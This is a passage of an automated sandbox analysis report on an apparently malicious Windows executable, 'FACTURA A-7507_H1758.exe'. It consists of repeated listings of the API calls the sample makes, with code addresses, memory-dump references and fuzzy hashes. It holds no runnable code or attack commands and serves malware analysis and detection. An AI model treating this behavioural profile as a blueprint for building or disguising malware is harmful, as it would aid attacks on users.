                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                                                          • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                                                                                                                                                                          • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                                                                                                                                                                            • Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                                                                                                                                                                            • Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
                                                                                                                                                                                                                            • Part of subcall function 004064E8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040654E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                                                                                                          • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                                                                                                                                                                          • Instruction ID: 8c1a5bb66f910ccc430fc34c4425cef617f316e2833151c7c1ff8c8a0ee84b40
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3E086326042206BD6105B706E0893762BC9ED8740302483EF946F2084D778DC329A6D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000,?), ref: 00401DF2
                                                                                                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                                                                                                          • Opcode ID: dfe498c59e1a90f19dc21fe6b85702c545f727acc85ba8b066617fafdbc62111
                                                                                                                                                                                                                          • Instruction ID: 21ddd3577add1129786b8edf5e015a7aca6159172531db4ba1f8ff50d12c07f3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfe498c59e1a90f19dc21fe6b85702c545f727acc85ba8b066617fafdbc62111
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E08C326005009BCB20AFB5AA4999D3375EF50369710017BE402F10E1CABC9C408A2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405D57
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405D79
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                                                                                                          • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                                                                                                                          • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
                                                                                                                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D47
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                          • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                                                                          • Instruction ID: 62c1218995ad43f24aa052634507c0d83541fa9dca801c4eab67991220ff17ac
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D01272504520AFC2513738EF0C89BBF95EB543B17028B35FAF9A22F0DB304C568A98
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040583D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                                                                                                          • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                                                                                                                          • Instruction ID: d963a2520b22da8993c1f0374a54a6368e12bf2bf52e26206a68f99a8800bbf8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC04C31204B029AD7506B609F097177954AB50781F11C8396946E00A0DE348465DE2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                                                                                                                            • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointerwsprintf
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 327478801-0
                                                                                                                                                                                                                          • Opcode ID: a43271754c7f07c99b9378ce98c7c6ca1c5cab0cf9015cd4f7670726b0543b0b
                                                                                                                                                                                                                          • Instruction ID: 0f14848d4f24c16631b00b750435c060a764b4453362ef8260df6bafad2d34e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a43271754c7f07c99b9378ce98c7c6ca1c5cab0cf9015cd4f7670726b0543b0b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FE01A71601114ABDB11EBA59E4ACAE766AAB40328B10443BF501F14E1CAB988619A2E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 390214022-0
                                                                                                                                                                                                                          • Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                                          • Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040D33D,0040CED0,004032EF,0040CED0,0040D33D,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                                                          • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                                                                          • Instruction ID: dac0b8971ba2920abb5474f128329a0fa477ab7403896bbfc0984bb8014ca22f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE08632100119ABCF105F50DC00EEB376CEB00350F004832FA65E2040E230EA219BE4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(00000000,0000012E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                                          • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                                                                                                                                                                                          • Instruction ID: ef45ff86538a2d51f1b0222ec8c1b297abd10be8bd22699319dc95f068cee933
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCE08676244108BFDB00DFA8DE47FD537ECAB14700F004031BA08D70D1C674E5508768
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040336B,0040A230,0040A230,0040326F,00414ED0,00004000,?,00000000,00403119), ref: 00405DEA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                          • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                                          • Instruction ID: f39de87387fc754cac4ceee649b5e38243fe2bf9183d254406dbd5143e25ae03
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57E0EC3221125AABDF509F65DC08AEB7B6DEF05360F008837F955E6160D631E9219BE8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                          • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
